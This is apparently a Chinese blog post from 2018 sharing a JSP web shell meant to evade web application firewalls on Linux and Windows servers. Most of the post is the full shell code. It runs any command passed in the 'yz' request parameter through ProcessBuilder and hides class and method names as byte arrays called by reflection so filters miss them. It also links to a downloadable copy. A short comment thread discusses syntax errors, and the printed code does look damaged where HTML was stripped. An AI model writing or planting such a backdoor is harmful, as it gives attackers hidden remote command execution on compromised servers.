一个绕waf的linux-windows-cmd.jsp

2018-5-13 小屿 Java

http://www.p2j.cn/?p=1863

园长师傅教我拿反射写,然后自己发挥写了个linux和windows都能用的http://xia0yu.win/linux_win_cmd.jsp.bak 

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.util.List" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.util.Arrays" %>
<%@ page import="java.io.PrintWriter" %>
<% List list = Arrays.asList(request.getParameter("yz").split("\\s+"));

    Constructor constructor = Class.forName(new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 80, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114})).getDeclaredConstructor(List.class);
    constructor.setAccessible(true);

    Object object = constructor.newInstance(list);
    Class objectGetclass = object.getClass();

    Method startMethod = objectGetclass.getDeclaredMethod(new String(new byte[]{115, 116, 97, 114, 116}));
    startMethod.setAccessible(true);

    Object object2 = startMethod.invoke(object);
    Method getInputStreamMethod = object2.getClass().getMethod(new String(new byte[]{103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109}));
    getInputStreamMethod.setAccessible(true);

    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader((InputStream) getInputStreamMethod.invoke(object2)));

    PrintWriter printWriter = response.getWriter();

    String str = "";
    printWriter.println("

");
    while ((str = bufferedReader.readLine()) != null) {
        printWriter.println(str);
    }
    printWriter.println("

");
%>


linxu.pngwin.png

« Apache Commons-Collections-3.2.1 反序列化漏洞浅析 | Python通用弱口令检测»

评论:

liod
2018-05-22 14:05
这个shell语法有问题吧 我贴出来全是语法错误 tomact9.0
回复
小屿
2018-05-27 18:20
@liod:没多大问题,源码显示器的原因,看这个ehttp://xia0yu.win/linux_win_cmd.jsp.bak
回复

发表评论:

Powered by xia0yu